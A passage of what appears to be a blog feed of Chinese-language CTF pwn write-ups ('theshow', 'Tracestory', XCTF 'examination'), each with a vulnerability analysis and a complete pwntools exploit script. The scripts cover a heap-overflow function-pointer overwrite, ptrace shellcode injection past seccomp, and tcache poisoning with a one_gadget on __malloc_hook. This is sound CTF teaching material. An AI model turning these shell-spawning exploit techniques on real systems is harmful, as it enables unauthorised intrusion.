<h2 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h2><p>一开始发现了向程序输入 <code>showDescription</code> 时有溢出。而且程序给出了一个 <code>win</code> 函数(我一开始还没有发现,因为函数实在太多,没有注意到)。只要把<code>win</code>函数地址覆写到<code>mainAct + 0x60</code>上替换掉<code>tellAJoke</code>函数我们就可以获得flag。而我们需要<code>showDescription = malloc_set(v22 + 8);</code>在申请堆块的时候在<code>mainAct</code>的上方。而<code>message1</code>和<code>message3</code>是在我们申请之前<code>free</code>了。所以我们只需要申请的<code>size</code>和这两个堆块的一样,就可以达到我们的要求。</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">*(_QWORD *)(mainAct + <span class="number">0x60</span>) = tellAJoke;</span><br><span class="line">currentAct = mainAct;</span><br><span class="line"><span class="built_in">free</span>(message1);</span><br><span class="line"><span class="built_in">free</span>(message3);</span><br><span class="line"><span class="built_in">puts</span>(<span class="string">"How long do you want the show description to be?"</span>);</span><br><span class="line">_isoc99_scanf((<span class="keyword">unsigned</span> <span class="keyword">int</span>)<span class="string">"%d"</span>, (<span class="keyword">unsigned</span> <span class="keyword">int</span>)&v22, v17, v18, v19, v20);</span><br><span class="line">showDescription = malloc_set(v22 + <span class="number">8</span>);</span><br><span class="line"><span class="built_in">puts</span>(<span class="string">"Describe the show for us:"</span>);</span><br><span class="line">getchar();</span><br><span class="line">fgets(showDescription, <span class="number">500LL</span>, <span class="built_in">stdin</span>);</span><br><span class="line">actList = mainAct;</span><br></pre></td></tr></table></figure>
<h2 id="exp-1"><a href="#exp-1" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">'linux'</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line"><span class="comment"># context.arch = 'i386'</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">'theshow'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line"> p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line"> p = remote(<span class="string">'node4.buuoj.cn'</span>,<span class="number">20002</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line"> p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">12345</span>)</span><br><span class="line"> <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">mainAct = <span class="number">0x0000000006F76C0</span></span><br><span class="line">showDescription = <span class="number">0x0000000006E84F0</span></span><br><span class="line">win = <span class="number">0x000000000400BED</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">'What is the name of your act?'</span>,<span class="string">'aaaa'</span>)</span><br><span class="line">p.sendlineafter(<span class="string">'How long do you want the show description to be?'</span>,<span class="built_in">str</span>(<span class="number">0x80</span>))</span><br><span class="line">payload = <span class="string">'f'</span>*<span class="number">0x88</span> + p64(<span class="number">0x71</span>) + <span class="string">'f'</span>*<span class="number">0x60</span> + p64(win)</span><br><span class="line">p.sendlineafter(<span class="string">'Describe the show for us:'</span>,payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="Tracestory"><a href="#Tracestory" class="headerlink" title="Tracestory"></a>Tracestory</h1><blockquote>
<p>I am trying to figure out the end of this story, but I am not able to read it. Could you help me figure out what it is?</p>
<p><strong>Author</strong>: WittsEnd2</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">0.cloud.chals.io 15148</span><br></pre></td></tr></table></figure>
<p>tag: seccomp shellcode </p>
</blockquote>
<h2 id="概要-1"><a href="#概要-1" class="headerlink" title="概要"></a>概要</h2><p>一个<code>seccomp</code>题目,父进程写汇编利用<code>ptrace</code>将<code>shellcode</code>注入到子进程的<code>text</code>段中来绕过<code>seccomp</code>。</p>
<h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p>在<code>seccomp</code>规则之前,父进程就<code>fork</code>出了子进程。后父进程读取用户输入,调用<code>setup_seccomp</code>,然后执行受<code>seccomp</code>过滤的代码。</p>
<p>利用<code>ptrace</code>可以不受<code>seccomp</code>的限制,控制子进程。</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="comment">// seccomp-tools dump ./trace_story</span></span><br><span class="line">line CODE JT JF K</span><br><span class="line">=================================</span><br><span class="line"> <span class="number">0000</span>: <span class="number">0x20</span> <span class="number">0x00</span> <span class="number">0x00</span> <span class="number">0x00000004</span> A = arch</span><br><span class="line"> <span class="number">0001</span>: <span class="number">0x15</span> <span class="number">0x00</span> <span class="number">0x18</span> <span class="number">0xc000003e</span> <span class="keyword">if</span> (A != ARCH_X86_64) <span class="keyword">goto</span> <span class="number">0026</span></span><br><span class="line"> <span class="number">0002</span>: <span class="number">0x20</span> <span class="number">0x00</span> <span class="number">0x00</span> <span class="number">0x00000000</span> A = sys_number</span><br><span class="line"> <span class="number">0003</span>: <span class="number">0x35</span> <span class="number">0x00</span> <span class="number">0x01</span> <span class="number">0x40000000</span> <span class="keyword">if</span> (A < <span class="number">0x40000000</span>) <span class="keyword">goto</span> <span class="number">0005</span></span><br><span class="line"> <span class="number">0004</span>: <span class="number">0x15</span> <span class="number">0x00</span> <span class="number">0x15</span> <span class="number">0xffffffff</span> <span class="keyword">if</span> (A != <span class="number">0xffffffff</span>) <span class="keyword">goto</span> <span class="number">0026</span></span><br><span class="line"> <span class="number">0005</span>: <span class="number">0x15</span> <span class="number">0x13</span> <span class="number">0x00</span> <span class="number">0x00000003</span> <span class="keyword">if</span> (A == close) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0006</span>: <span class="number">0x15</span> <span class="number">0x12</span> <span class="number">0x00</span> <span class="number">0x00000004</span> <span class="keyword">if</span> (A == stat) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0007</span>: <span class="number">0x15</span> <span class="number">0x11</span> <span class="number">0x00</span> <span class="number">0x00000005</span> <span class="keyword">if</span> (A == fstat) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0008</span>: <span class="number">0x15</span> <span class="number">0x10</span> <span class="number">0x00</span> <span class="number">0x00000006</span> <span class="keyword">if</span> (A == lstat) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0009</span>: <span class="number">0x15</span> <span class="number">0x0f</span> <span class="number">0x00</span> <span class="number">0x0000000a</span> <span class="keyword">if</span> (A == mprotect) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0010</span>: <span class="number">0x15</span> <span class="number">0x0e</span> <span class="number">0x00</span> <span class="number">0x0000000c</span> <span class="keyword">if</span> (A == brk) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0011</span>: <span class="number">0x15</span> <span class="number">0x0d</span> <span class="number">0x00</span> <span class="number">0x00000015</span> <span class="keyword">if</span> (A == access) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0012</span>: <span class="number">0x15</span> <span class="number">0x0c</span> <span class="number">0x00</span> <span class="number">0x00000018</span> <span class="keyword">if</span> (A == sched_yield) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0013</span>: <span class="number">0x15</span> <span class="number">0x0b</span> <span class="number">0x00</span> <span class="number">0x00000020</span> <span class="keyword">if</span> (A == dup) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0014</span>: <span class="number">0x15</span> <span class="number">0x0a</span> <span class="number">0x00</span> <span class="number">0x00000021</span> <span class="keyword">if</span> (A == dup2) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0015</span>: <span class="number">0x15</span> <span class="number">0x09</span> <span class="number">0x00</span> <span class="number">0x00000038</span> <span class="keyword">if</span> (A == clone) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0016</span>: <span class="number">0x15</span> <span class="number">0x08</span> <span class="number">0x00</span> <span class="number">0x0000003c</span> <span class="keyword">if</span> (A == <span class="built_in">exit</span>) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0017</span>: <span class="number">0x15</span> <span class="number">0x07</span> <span class="number">0x00</span> <span class="number">0x0000003e</span> <span class="keyword">if</span> (A == kill) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0018</span>: <span class="number">0x15</span> <span class="number">0x06</span> <span class="number">0x00</span> <span class="number">0x00000050</span> <span class="keyword">if</span> (A == chdir) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0019</span>: <span class="number">0x15</span> <span class="number">0x05</span> <span class="number">0x00</span> <span class="number">0x00000051</span> <span class="keyword">if</span> (A == fchdir) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0020</span>: <span class="number">0x15</span> <span class="number">0x04</span> <span class="number">0x00</span> <span class="number">0x00000060</span> <span class="keyword">if</span> (A == gettimeofday) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0021</span>: <span class="number">0x15</span> <span class="number">0x03</span> <span class="number">0x00</span> <span class="number">0x00000065</span> <span class="keyword">if</span> (A == ptrace) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0022</span>: <span class="number">0x15</span> <span class="number">0x02</span> <span class="number">0x00</span> <span class="number">0x00000066</span> <span class="keyword">if</span> (A == getuid) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0023</span>: <span class="number">0x15</span> <span class="number">0x01</span> <span class="number">0x00</span> <span class="number">0x00000068</span> <span class="keyword">if</span> (A == getgid) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0024</span>: <span class="number">0x15</span> <span class="number">0x00</span> <span class="number">0x01</span> <span class="number">0x000000e7</span> <span class="keyword">if</span> (A != exit_group) <span class="keyword">goto</span> <span class="number">0026</span></span><br><span class="line"> <span class="number">0025</span>: <span class="number">0x06</span> <span class="number">0x00</span> <span class="number">0x00</span> <span class="number">0x7fff0000</span> <span class="keyword">return</span> ALLOW</span><br><span class="line"> <span class="number">0026</span>: <span class="number">0x06</span> <span class="number">0x00</span> <span class="number">0x00</span> <span class="number">0x00000000</span> <span class="keyword">return</span> KILL</span><br></pre></td></tr></table></figure>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>子进程是一个死循环,我们可以覆盖循环开头的<code>text</code>段。</p>
<p>用<code>ptrace</code>函数附加到子进程流程:</p>
<ul>
<li>追踪指定<code>pid</code>的进程:<code>ptrace(PTRACE_ATTACH, CHILD_PID, 0, 0)</code></li>
<li>等待子进程附加<code>wait(0)</code></li>
<li>往内存地址写入一个字节,地址由<code>addr</code>给出:<code>ptrace(PTRACE_POKETEXT, CHILD_PID, CODE_ADDRESS, 8_BYTES_OF_CODE)</code></li>
<li>结束追踪:<code>ptrace(PTRACE_DETACH, CHILD_PID, 0, 0)</code></li>
<li>attach -> write_text -> detach -> go back to beginning</li>
</ul>
<p><a href="https://www.jianshu.com/p/b1f9d6911c90">ptrace函数参考</a></p>
<h2 id="exp-2"><a href="#exp-2" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.binary = ELF(<span class="string">'trace_story'</span>)</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">p = process(<span class="string">'./trace_story'</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">"pid: "</span>)</span><br><span class="line">pid = <span class="built_in">int</span>(p.recvline().strip())</span><br><span class="line"><span class="built_in">print</span>(<span class="string">"pid: "</span>,pid)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">"begin:"</span></span><br><span class="line">payload += shellcraft.ptrace(constants.linux.PTRACE_ATTACH, pid, <span class="number">0</span>, <span class="number">0</span>)</span><br><span class="line">binsh = asm(shellcraft.sh())</span><br><span class="line">start_addr = <span class="number">0x401789</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="built_in">int</span>(<span class="built_in">len</span>(binsh)/<span class="number">8</span>)):</span><br><span class="line"> shellcode = u64(binsh[i * <span class="number">8</span>:<span class="number">8</span>+(i*<span class="number">8</span>)])</span><br><span class="line"> payload += shellcraft.ptrace(constants.linux.PTRACE_POKETEXT, pid, start_addr + (i * <span class="number">8</span>), shellcode)</span><br><span class="line">payload += shellcraft.ptrace(constants.linux.PTRACE_DETACH, pid, <span class="number">0</span>, <span class="number">0</span>)</span><br><span class="line">payload += <span class="string">"""</span></span><br><span class="line"><span class="string">jmp begin</span></span><br><span class="line"><span class="string">"""</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b'Input: \n'</span>, asm(payload))</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<p><a href="https://elbiazo.com/posts/umdctf-2022/">参考1</a> <a href="https://github.com/datajerk/ctf-write-ups/tree/master/umdctf2022/trace_story">参考2</a></p>
]]></content>
<categories>
<category>WriteUp</category>
</categories>
<tags>
<tag>python2</tag>
<tag>ROP</tag>
<tag>fmt</tag>
<tag>heap-overflow</tag>
<tag>seccomp</tag>
<tag>shellcode</tag>
</tags>
</entry>
<entry>
<title>XCTF-StartCTF</title>
<url>/article/XCTF-StartCTF/</url>
<content><![CDATA[<h1 id="XCTF-StartCTF"><a href="#XCTF-StartCTF" class="headerlink" title="XCTF-StartCTF"></a>XCTF-StartCTF</h1><!-- 文章页 配置 -->
<h1 id="examination"><a href="#examination" class="headerlink" title="examination"></a>examination</h1><blockquote>
<p>ret2school once again<br>nc 124.70.130.92 60001</p>
</blockquote>
<h2 id="结构体"><a href="#结构体" class="headerlink" title="结构体"></a>结构体</h2><figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">student</span></span></span><br><span class="line"><span class="class">{</span></span><br><span class="line"> __int64 *score_addr;</span><br><span class="line"> null;</span><br><span class="line"> __int64 *mode_addr;</span><br><span class="line"> <span class="keyword">int</span> pray_flag;</span><br><span class="line"> <span class="keyword">int</span> reward_flag;</span><br><span class="line"> </span><br><span class="line">}S;</span><br><span class="line"><span class="comment">// size = 0x30</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">student_score</span></span></span><br><span class="line"><span class="class">{</span></span><br><span class="line"> <span class="keyword">int</span> number_of_questions;</span><br><span class="line"> <span class="keyword">int</span> score;</span><br><span class="line"> <span class="keyword">char</span> *review_addr;</span><br><span class="line"> <span class="keyword">int</span> review_size;</span><br><span class="line">}Ss;</span><br><span class="line"><span class="comment">// size = 0x20</span></span><br></pre></td></tr></table></figure>
<h2 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h2><ol>
<li>student_pray -> teacher_score,减了10分之后造成整数溢出,满足<code>check for review</code>任意地址+1的条件</li>
<li>在<code>review_size</code>的地址+1,造成write溢出和show的溢出。</li>
<li>先打tcache,再onegadget到malloc_hook</li>
<li>teacher_6,触发malloc,getshell</li>
</ol>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"><span class="keyword">import</span> ctypes</span><br><span class="line">context.os = <span class="string">'linux'</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line"><span class="comment"># context.arch = 'i386'</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">'examination'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line"> p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line"> p = remote(<span class="string">'node4.buuoj.cn'</span>,<span class="number">25323</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line"> p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">12345</span>)</span><br><span class="line"> <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">'./libc.so.6'</span>)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd</span>(<span class="params">index</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'choice>> '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="comment">########################### Teacher ##############################</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">num</span>):</span></span><br><span class="line"> cmd(<span class="number">1</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'questions: '</span>,<span class="built_in">str</span>(num))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">score</span>():</span></span><br><span class="line"> cmd(<span class="number">2</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">write_a_review_first</span>(<span class="params">index,size,comment</span>):</span></span><br><span class="line"> cmd(<span class="number">3</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'which one? > '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"> p.sendlineafter(<span class="string">'size of comment: '</span>,<span class="built_in">str</span>(size))</span><br><span class="line"> p.sendlineafter(<span class="string">'enter your comment:'</span>,comment)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">write_a_review</span>(<span class="params">index,comment</span>):</span></span><br><span class="line"> cmd(<span class="number">3</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'which one? > '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"> p.sendlineafter(<span class="string">'enter your comment:'</span>,comment)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">parent</span>(<span class="params">index</span>):</span></span><br><span class="line"> cmd(<span class="number">4</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'choose?\n'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="comment">########################### Student ##############################</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">student_check</span>():</span></span><br><span class="line"> cmd(<span class="number">2</span>)</span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">student_pray</span>():</span></span><br><span class="line"> cmd(<span class="number">3</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">student_mode</span>(<span class="params">mode,score=<span class="literal">None</span></span>):</span></span><br><span class="line"> cmd(<span class="number">4</span>)</span><br><span class="line"> data = p.recvline()</span><br><span class="line"> <span class="keyword">if</span> <span class="string">"100"</span> <span class="keyword">in</span> data:</span><br><span class="line"> p.sendline(score)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> p.sendline(mode)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">student_changeid</span>(<span class="params">ID</span>):</span></span><br><span class="line"> cmd(<span class="number">6</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'input your id: '</span>,<span class="built_in">str</span>(ID))</span><br><span class="line"></span><br><span class="line"><span class="comment">#########################################################</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">studenttoTeacher</span>():</span></span><br><span class="line"> cmd(<span class="number">5</span>)</span><br><span class="line"> role(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">teachertoStudent</span>():</span></span><br><span class="line"> cmd(<span class="number">5</span>)</span><br><span class="line"> role(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">role</span>(<span class="params">index</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'<0.teacher/1.student>: '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="comment">#########################################################</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(p,'b *$rebase(0x1e0b)')</span></span><br><span class="line"></span><br><span class="line">role(<span class="number">0</span>)</span><br><span class="line">add(<span class="number">1</span>)</span><br><span class="line">teachertoStudent()</span><br><span class="line">student_pray()</span><br><span class="line">studenttoTeacher()</span><br><span class="line">score()</span><br><span class="line">write_a_review_first(<span class="number">0</span>,<span class="number">0x10</span>,<span class="string">'a'</span>*<span class="number">0x10</span>)</span><br><span class="line">teachertoStudent()</span><br><span class="line">student_check()</span><br><span class="line">p.recvuntil(<span class="string">'reward! '</span>)</span><br><span class="line">heap_base = <span class="built_in">int</span>(p.recv(<span class="number">14</span>),<span class="number">16</span>) - <span class="number">0x2a0</span></span><br><span class="line">log.success(<span class="string">'addr: '</span> + <span class="built_in">hex</span>(heap_base))</span><br><span class="line">p.sendlineafter(<span class="string">'add 1 to wherever you want! addr: '</span>,<span class="built_in">str</span>(((heap_base+<span class="number">0x2e1</span>)*<span class="number">10</span>)))</span><br><span class="line"></span><br><span class="line">studenttoTeacher()</span><br><span class="line">add(<span class="number">2</span>)</span><br><span class="line">write_a_review_first(<span class="number">1</span>,<span class="number">0x80</span>,<span class="string">'b'</span>*<span class="number">0x10</span>)</span><br><span class="line">target_addr = heap_base + <span class="number">0x10</span></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x10</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x31</span>)</span><br><span class="line">payload += p64(heap_base+<span class="number">0x340</span>) + p64(<span class="number">0</span>)*<span class="number">4</span> + p64(<span class="number">0x21</span>)</span><br><span class="line">payload += p64(<span class="number">2</span>) + p64(target_addr)</span><br><span class="line">payload += p64(<span class="number">0x100</span>) + p64(<span class="number">0x91</span>)</span><br><span class="line">write_a_review(<span class="number">0</span>,payload)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'\xff'</span>*<span class="number">0x20</span></span><br><span class="line">write_a_review(<span class="number">1</span>,payload)</span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x10</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x31</span>)</span><br><span class="line">payload += p64(heap_base+<span class="number">0x340</span>) + p64(<span class="number">0</span>)*<span class="number">4</span> + p64(<span class="number">0x21</span>)</span><br><span class="line">payload += p64(<span class="number">2</span>) + p64(heap_base+<span class="number">0x360</span>)</span><br><span class="line">payload += p64(<span class="number">0x100</span>) + p64(<span class="number">0x91</span>)</span><br><span class="line">write_a_review(<span class="number">0</span>,payload)</span><br><span class="line">add(<span class="number">3</span>)</span><br><span class="line">parent(<span class="number">1</span>)</span><br><span class="line">add(<span class="number">2</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'b'</span>*<span class="number">0x18</span> + p64(<span class="number">0x31</span>) + p64(heap_base+<span class="number">0x340</span>) + p64(<span class="number">0</span>)*<span class="number">4</span></span><br><span class="line">payload += p64(<span class="number">0x21</span>) + p64(<span class="number">2</span>) + p64(heap_base+<span class="number">0x2b8</span>) + p64(<span class="number">0x110</span>) + p64(<span class="number">0x91</span>)</span><br><span class="line">write_a_review(<span class="number">0</span>,payload)</span><br><span class="line">write_a_review(<span class="number">2</span>,p64(<span class="number">0</span>))</span><br><span class="line">teachertoStudent()</span><br><span class="line">student_changeid(<span class="number">2</span>)</span><br><span class="line">student_check()</span><br><span class="line">malloc_hook = u64(p.recvuntil(<span class="string">'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>)) + <span class="number">0x66</span></span><br><span class="line">libc_base = malloc_hook - libc.sym[<span class="string">'__malloc_hook'</span>]</span><br><span class="line">one = libc_base + <span class="number">0xe3b31</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">0xe3b2e execve("/bin/sh", r15, r12)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string"> [r15] == NULL || r15 == NULL</span></span><br><span class="line"><span class="string"> [r12] == NULL || r12 == NULL</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">0xe3b31 execve("/bin/sh", r15, rdx)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string"> [r15] == NULL || r15 == NULL</span></span><br><span class="line"><span class="string"> [rdx] == NULL || rdx == NULL</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">0xe3b34 execve("/bin/sh", rsi, rdx)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string"> [rsi] == NULL || rsi == NULL</span></span><br><span class="line"><span class="string"> [rdx] == NULL || rdx == NULL</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">log.success(<span class="string">'libc_base: '</span> + <span class="built_in">hex</span>(malloc_hook))</span><br><span class="line"></span><br><span class="line">studenttoTeacher()</span><br><span class="line">payload = <span class="string">'b'</span>*<span class="number">0x18</span> + p64(<span class="number">0x31</span>) + p64(heap_base+<span class="number">0x340</span>) + p64(<span class="number">0</span>)*<span class="number">4</span></span><br><span class="line">payload += p64(<span class="number">0x21</span>) + p64(<span class="number">2</span>) + p64(malloc_hook) + p64(<span class="number">0x110</span>) + p64(<span class="number">0x91</span>)</span><br><span class="line">write_a_review(<span class="number">0</span>,payload)</span><br><span class="line">write_a_review(<span class="number">2</span>,p64(one))</span><br><span class="line">cmd(<span class="number">6</span>)</span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="babynote"><a href="#babynote" class="headerlink" title="babynote"></a>babynote</h1><blockquote>
<p>It’s just a traditional challenge<br>nc 123.60.76.240 60001</p>
</blockquote>
<p>一个musl的题目</p>
<h2 id="libc-so"><a href="#libc-so" class="headerlink" title="libc.so"></a>libc.so</h2><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">musl libc (x86_64)</span><br><span class="line">Version 1.2.2</span><br><span class="line">Dynamic Program Loader</span><br><span class="line">Usage: ./libc.so [options] [--] pathname [args]</span><br></pre></td></tr></table></figure>
<h2 id="musl启动方法"><a href="#musl启动方法" class="headerlink" title="musl启动方法"></a>musl启动方法</h2><p>直接利用题目给的libc文件</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">./libc.so ./babynote</span><br></pre></td></tr></table></figure>
<p>exp中:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">p = process([<span class="string">"./libc.so"</span>,<span class="string">'./babynote'</span>])</span><br></pre></td></tr></table></figure>
<h2 id="musl-pwn基础"><a href="#musl-pwn基础" class="headerlink" title="musl pwn基础"></a>musl pwn基础</h2><p>咕咕咕…</p>
<h1 id="ping"><a href="#ping" class="headerlink" title="ping"></a>ping</h1><blockquote>
<p>$ ping 123.60.8.251<br>PING 123.60.8.251 (123.60.8.251): 56 data bytes<br>64 bytes from 123.60.8.251: icmp_seq=0 ttl=39 time=20.397 ms<br>64 bytes from 123.60.8.251: icmp_seq=1 ttl=39 time=18.976 ms<br>64 bytes from 123.60.8.251: icmp_seq=2 ttl=39 time=20.381 ms<br>64 bytes from 123.60.8.251: icmp_seq=3 ttl=39 time=18.297 ms<br>64 bytes from 123.60.8.251: icmp_seq=4 ttl=39 time=20.751 ms</p>
<p>mirror server: 20.239.70.121</p>
</blockquote>
<h1 id="babyarm"><a href="#babyarm" class="headerlink" title="babyarm"></a>babyarm</h1><blockquote>
<p>It is so simple, simplest, cannot be simpler…</p>
<p><a href="https://drive.google.com/file/d/1urPkXtXQvgbuoiC12wlJ9Kp6U1B8frTu/view?usp=sharing">Download Link</a></p>
<p>nc 124.70.158.154 60001</p>
</blockquote>
]]></content>
<categories>
<category>WriteUp</category>
</categories>
</entry>
<entry>
<title>XCTF-SUSCTF2022</title>
<url>/article/XCTF-SUSCTF2022/</url>
<content><![CDATA[<h1 id="XCTF-SUSCTF2022"><a href="#XCTF-SUSCTF2022" class="headerlink" title="XCTF-SUSCTF2022"></a>XCTF-SUSCTF2022</h1><span id="more"></span>
<h1 id="happytree"><a href="#happytree" class="headerlink" title="happytree"></a>happytree</h1><p>checksec </p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">Arch: amd64-64-little</span><br><span class="line">RELRO: Full RELRO</span><br><span class="line">Stack: Canary found</span><br><span class="line">NX: NX enabled</span><br><span class="line">PIE: PIE enabled</span><br></pre></td></tr></table></figure>
<p>咕咕咕…</p>
]]></content>
<categories>
<category>WriteUp</category>
</categories>
</entry>
<entry>
<title>house of einherjar</title>
<url>/article/house%20of%20einherjar/</url>
